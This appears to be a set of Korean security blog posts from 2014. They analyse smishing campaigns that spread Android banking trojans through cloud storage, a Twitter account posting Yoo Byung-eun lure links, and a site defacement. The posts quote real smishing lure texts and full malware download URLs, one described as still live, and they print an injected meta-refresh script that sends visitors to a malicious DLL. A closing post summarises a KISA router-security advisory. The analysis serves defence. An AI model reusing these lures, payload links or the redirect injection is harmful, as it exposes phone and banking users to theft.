확인되었다.


Amazon Web Services(AWS)는 여러 웹서비스들을 제공하지만 이번 스미싱은 Amazon S3(Simple Storage Service) 서비스를 

통해 악성 어플리케이션을 업로드 후 스미싱 문구에 해당 URL 이 이용되고 있다.



티 클라우드(SK T Cloud), 나무 클라우드(NamuCloud), 드롭박스(DropBox), 앱박스(app.box.com), 클립투넷(clip2net.com),

미디어파이(mediafire), 카피(copy.com) 서버에 이어 8번째 클라우드 서버이다.


이번 클라우드 서버는 특히 유명한 쇼핑몰인 아마존에서 서비스하는 클라우드 서비스라 차단이 빠를 것으로 기대했는데,

역시나 유료 서비스가 많다보니 차단이 빠르게 이루어지고 있는 것으로 보여진다.




이전 클라우드 서버를 이용한 스미싱 포스팅은 아래의 링크에서 확인하면 된다.



이번 Amazon Web Services(aws.amazon.com)의 내용은 아래에서 설명하겠다. 

아래의 내용은 실제 스미싱 문자를 수신 받은 내용이다.


- 우편물이 고객님의부재중으로반송되었습니다 등기물정보확인하기. http://kccks.org

- 드디어저희결혼합니다축하해주세요7월23일12시,꼭와주세요^^ http://ka.do/WVe8

- 드디어저희결혼합니다축하해주세요7월23일12시,꼭와주세요^^ http://ka.do/e7SH

- 드디어저희결혼합니다축하해주세요7월19일12시,꼭와주세요^^ http://kiiye.co

- 고객님배송부재중으로반송되었습니다.상세주소다시확인。 http://go9.co/waH

- 드디어저희결혼합니다축하해주세요8월1일12시,꼭와주세요^^ http://go9.co/wcB

- ♡미화결혼합니다.꼭참석하시어축하해주세요~ http://go9.co/wfi

- 와인처럼 달/콤/한/사/랑을 만들어 드립니다 가입하기 http://woz.kr/Ileho


이 중 한가지 URL만 확인해 보면, 


http://woz.kr/Ileho

ㄴ http://cl.ly/002v273O410C/download/9%E3%80%817Phone.apk

  ㄴ http://api.cld.me/002v273O410C/download/9%E3%80%817Phone.apk

     ㄴ https://s3.amazonaws.com/f.cl.ly/items/071a3w3z1M2O1Y2R2l3y/9%E3%80%817Phone.apk?AWSAccessKeyId=AKIAJEFUZRCWSLB2QA5Q&Expires=1406884359&Signature=X%2BkogelpFGEoPBnf15FbmHuWBhA%3D&response-content-disposition=attachment



해당 악성 어플리케이션들은 알약 안드로이드에서 Trojan.Android.SMS.Stech 로 탐지 된다.



※ 현재 알약 안드로이드에서는 해당 스미싱 문자를 구분하고 있으므로, 
알약 안드로이드 사용자들은 스미싱 옵션을 "On"으로 켜두기 바람!!



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




지난 7월 22일부터 유병언 관련 스미싱 문구를 유포 중인 트위터를 관찰 중이다.


해당 트위터는 유병언 관련 스미싱 문구뿐만 아니라, 이슈가 되는 내용에 따라 문구를 바꾸고 있다.

하지만 주요 문구는 유병언과 관련 된 문구가 대다수 이다.


또한 기자들을 사칭하여 사용자들의 클릭을 유도하기도 하며,

최근에는 유병언 비서라고 사칭하기도 하였다.




아래는 해당 트위터에 대한 히스토리 내역이다.

- 최초 유포 트위터 히스토리


2014-07-22 : 김민숙 기자 사칭

ㄴ 주소지변경된후의 새로운 모바일지도 다운받어보세요 http://985.so/aHHZ 

ㄴ 안재욱, 미국서 병원비만 5억…“의료 민영화의 산 증인” http://985.so/aHHZ 

ㄴ 이병언 비밀금고 유서확인 영상 공개 http://is.gd/WkbkDt 

ㄴ 유병언 비밀금고에서 유서확인 비공개영상입니다 다운받고 세상에 알려 주세요http://t.cn/RPyeVwB 



2014-07-23 : KBS이해선 기사 사칭

ㄴ 유병언 비밀금고 공개  http://url.cn/ItTKAt 

ㄴ [ 유병언 ] 알고보니 암살 http://url.cn/ItTKAt 

ㄴ 유병언 암살 유병언에 관한 모든것 영상으로 담아봣어요  http://url.cn/ItTKAt 

ㄴ [ 유병언 금고 ]    비공개 영상입니다 다운받어보세요 http://985.so/aJrT



2014-07-24 : 유병언 비서 사칭

ㄴ [ 유병언 금고 ] 비공개영상입니다 다운받어보세요http://url.cn/ItTKAt

ㄴ [ 유병언 비밀금고 공개 ] 비공개영상입니다 다운받어보세요http://is.gd/KdwrPG

ㄴ [ 유병언] 비밀장부를 공개합니다 다운받어보세요 http://is.gd/KdwrPG




※ 항상 오전 4~ 6시 사이에 트윗을 올리고 있으며, 7월 24일 이후 새로운 트윗은 없는 상태이다.



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





7월달에 들어서면서 탐지 된 스미싱 문자 중 "카피(copy.com)" 서버를 이용한 악성 어플리케이션 다운로드를 확인하였다.

(실제 해당 클라우드는 2014년 3월부터 나왔었는데....그때는 왜 못봤나 싶다 ㅠㅠ)


티 클라우드(SK T Cloud), 나무 클라우드(NamuCloud), 드롭박스(DropBox), 앱박스(app.box.com), 클립투넷(clip2net.com),

미디어파이(mediafire) 에 이어 7번째 클라우드 서버이다.


이번 클라우드 서버도 외국 서비스라 악성 어플리케이션 차단은 좀 느린 듯 하다.

또한 dropbox보다는 가입 시 주는 저장 용량이 15GB나 되어 최근 많이 사용되고 있는 듯 하다.



이전 클라우드 서버를 이용한 스미싱 포스팅은 아래의 링크에서 확인하면 된다.


※ 아래의 그림은 Copy.com에 가입해서 업로드 시켜 본 그림들이다.





이번 카피(copy.com)의 내용은 아래에서 설명하겠다. 

아래의 내용은 실제 스미싱 문자를 수신 받은 내용이다.


- 드디어저희결혼합니다축하해주세요 7월26일12시 꼭와주세요 ^^ http://grep.kr/9j9

ㄴ https://copy.com/XssQL2SeiEqw/%EA%B2%B0%ED%98%BC%20%EC%B2%AD%EC%B2%A9%EC%9E%A5.apk?download=1 (결혼 청첩장.apk)


※ 현재 유포서버가 살아있지만 내맘대로 Full Url 공개!!


해당 악성 어플리케이션 결혼 청첩장.apk알약 안드로이드에서 Trojan.Android.KRBanker.Gen 로 탐지 된다

 

※ 현재 알약 안드로이드에서는 해당 스미싱 문자를 구분하고 있으므로, 
알약 안드로이드 사용자들은 스미싱 옵션을 "On"으로 켜두기 바람!!


이번 결혼 청첩장.apk 파일은 하나은행, KB국민은행, NH농협, 우체국 인터넷뱅킹, BS부산은행, 신한은행, 새마을금고, 

우리은행 등 총 8개의 인터넷뱅킹 어플리케이션을 노리고 있다.

 

 

 

 


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



기존의 사이트 변조는 InternetExplorer, Adobe Flash Player, Java Exploit 등 소프트웨어의 취약점 방식을 이용하여 

접속 된 PC가  취약점이 존재 할 시 특정 파일을 받게 되는 드라이브 바이 다운로드(Drive-by-Download)방식이 대부분 이였다.


그래서 이전에 기존 사이트 변조와는 다른 iframe, Document.Referrer 함수를 이용한 악성코드 다운로드 방식을 소개 한 적이 있었다.


이번에 확인 된 내용은 기존 Document.Referrer 함수를 이용한 사이트 변조와 유사하지만, 

exe를 다운로드 시키는 것이 아니라 dll 파일을 다운로드 시킨다는 것이 조금 다르다.



그럼 간단하게 이번 방식에 대해서 알아보자.

우선 실제 유포가 되고 사이트를 한번 확인해 볼 필요가 있다.


유포 사이트에는 아래와 같은 스크립트가 삽입되어 있었다.

(※ 파일 수집은 7월 4일에 이루어져있고, 현재는 변조 된 스크립트는 삭제 되었음을 미리 알림!!)

1. 최초 사이트 링크 : http://www.screenworld.co.kr

<HTML>

<HEAD>

<meta name='viewport' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no, target-densitydpi=medium-dpi' />

<TITLE>스크린월드</TITLE>

</HEAD>

<FRAMESET ROWS="100%,*" border=0>

<FRAME src=http://maxscreen.co.kr></FRAMESET>

</HTML>



2. 리다이렉션 된 사이트 링크 내부 스크립트 : http://maxscreen.co.kr

<meta http-equiv="refresh" content="0;url=http://maxscreen.co.kr/home">



3. 2차 리다이렉션 사이트 링크 내부 삽입 된 스크립트

<meta http-equiv="refresh" content="0.1; url=http://x5.hk/lpk.dll"></meta>


※ 삽입 된 스크립트는 url로 등록 된 http://x5.hk/lpk.dll 를 content에 셋팅 된 0.1초 후 새로고침과 동시에 이동하라는 내용



아래는 실제 접속 시 나오는 다운로드 화면이다.



다운로드 된 lpk.dll 파일은 정상적인 PE구조를 가지고 있지 않아 분석은 하지 않았다.


그런데 궁금한점은....왜 EXE가 아니라 DLL 이였을까? 하는 것이다.


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




인터넷침해대응센터(KISA)에서는 최근 유/무선 공유기 취약점으로 인한 DNS 변조를 통해 파밍 사이트 접속 문제가 

지속적으로 이루어지는 것을 방지하고자 개인사용자들의 유/무선 공유기의 보안을 설정하라는 권고 공지를 하였다.


원문 보기 : http://www.krcert.or.kr/kor/data/secNoticeView.jsp?p_bulletin_writing_sequence=21404

■ 개요

- 최근 보안설정이 미흡한 공유기를 대상으로 사칭앱, 악성코드 유포, 금융정보 탈취와 같은 피해 사례 발견

- 공격자는 보안설정이 미흡한 공유기의 DNS 정보를 변조하여 공유기 사용자를 가짜 사이트로 유도


■ 사용자 측면의 조치 방안

- 관리자 페이지 비밀번호 설정

공유기 사용 전 반드시 영문, 숫자, 특수문자를 조합한 8자리 이상의 관리자 비밀번호를 설정할 것을 권고


- 무선 공유기의 비밀번호 설정

무선 공유기를 사용할 경우 WPA2(Wi-Fi Protected Access) 인증방식 적용

비밀번호는 영문, 숫자, 특수문자를 조합한 8자리 이상으로 설정을 권고


- 공유기 원격관리 기능 해제

원격관리 기능을 사용하지 않을 경우 반드시 ‘사용하지 않음’으로 설정

원격 관리 기능을 사용할 경우, 비밀번호는 영문, 숫자, 특수문자 조합으로 8글자 이상을 권고


- 공유기 펌웨어 최신버전 유지

공유기의 펌웨어 버전이 최신버전이 아닌 경우, 자동업그레이드를 통해 최신버전으로 업그레이드


- 공공장소 무선인터넷 이용 시 단말기 DNS 수동 설정

사용자는 단말기(노트북, 스마트기기)의 DNS 설정을 알려진 대표 DNS IP로 수동 설정


■ 공유기 보안설정 방법

- 공유기 관리자 페이지 접속 방법

시작 메뉴 -> 모든 프로그램 -> 보조 프로그램 -> 명령 프롬프트


ipconfig 입력 후 기본 게이트웨이가 채워져 있는 부분을 찾아서 확인


기본 게이트웨이의 값을 인터넷 브라우저의 주소 표시줄에 입력하여 접속



- 공유기의 관리자 페이지에 접속하여 아래 사항들 설정

아래 그림들은 사용하고 있는 공유기 제조사마다 다를 수 있으니 각 제조사의 매뉴얼 참고[1]


- 관리자 페이지 계정 설정


- 원격관리 기능 해제


- 공유기 DNS 서버 수동 설정 여부 확인

수동으로 DNS 서버를 설정할 필요가 없는 경우, 확인 후 체크 해제


- 펌웨어 업그레이드

펌웨어 자동 업그레이드 기능을 통해 펌웨어 버전을 최신버전으로 유지

■ 기타 문의사항

한국인터넷진흥원 인터넷침해대응센터: 국번없이 118




[참고사이트]

[1] 공유기 제조사 별 매뉴얼 링크

- 네티스코리아

http://www.netiskorea.com/atboard_view.php?grp1=news&grp2=notice&uid=8156


- 넷기어

http://www.netgear-support.co.kr/Support/at_SingleBoard/support_faq_list.asp -> 각 공유기 모델별 “ 공유기 암호 및 원격관리 매뉴얼” 참고


- 넷탑씨앤씨(NTP)

http://www.nettop.co.kr/ -> 공지사항 -> “공유기를 이용한 파밍 공격 대처 요령” 참고


- 다보링크

http://www.davolink.co.kr/board/board.asp?chrBType=NOTICE&pageMode=READ&bIndex=5914&menuSeq=22


- 디링크

http://mydlink.co.kr/2013/notice/notice_detail.php?no=63&code=mydlink_notice_2009


- 디지털존(WeVo)

http://www.iwevo.co.kr/board.php?BID=board01&GID=root&mode=view&adminmode=&UID=55&CURRENT_PAGE=1&BOARD_NO=37&SEARCHTITLE=&searchkeyword=&category=


- 블레스정보통신(ZIO)

http://myzio.net/zio/pds/notice_security.pdf


- 애니게이트앤씨(ANYGATE)

http://www.anygate.co.kr/pub/bbs/content.asp?table=bbs_01&multi=bbs_notice&idx=529&visited=1425&page=1&startpage=1&search_1=&keyword_1=&list_pagesize=20&list_file=/pub/bbs/default.asp


- 유니콘

http://www.eunicorn.co.kr/kimsboard7/bbs..php?table=unicorn_faq&query=view&uid=1036


- EFM(ipTIME)

http://www.iptime.co.kr/~iptime/bbs/view.php?id=faq_setup&page=1&ffid=&fsid=&dffid=&dfsid=&dftid=&sn1=&divpage=1&dis_comp=&sn=off&ss=on&sc=on&keyword=계정&select_arrange=headnum&desc=asc&dis_comp=&ng_value=&x_value=&no=583


- 이지넷유비쿼터스(NEXT)

http://www.ez-net.co.kr/new_2012/customer/userguide_view.php?cid=&sid=&goods=&cate=&q=&seq=75&PHPSESSID=b7cbd945f0fbf81cc44542f84c4a6d53


- 티피링크

http://www.tplink.com/kr/article/?faqid=666


- 파테크(Axler)

https://www.axler.co.kr/ -> 공지사항 -> “[공지]파밍사이트(금강원) 및 무선 보안 임의 설정 관련” 참고


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.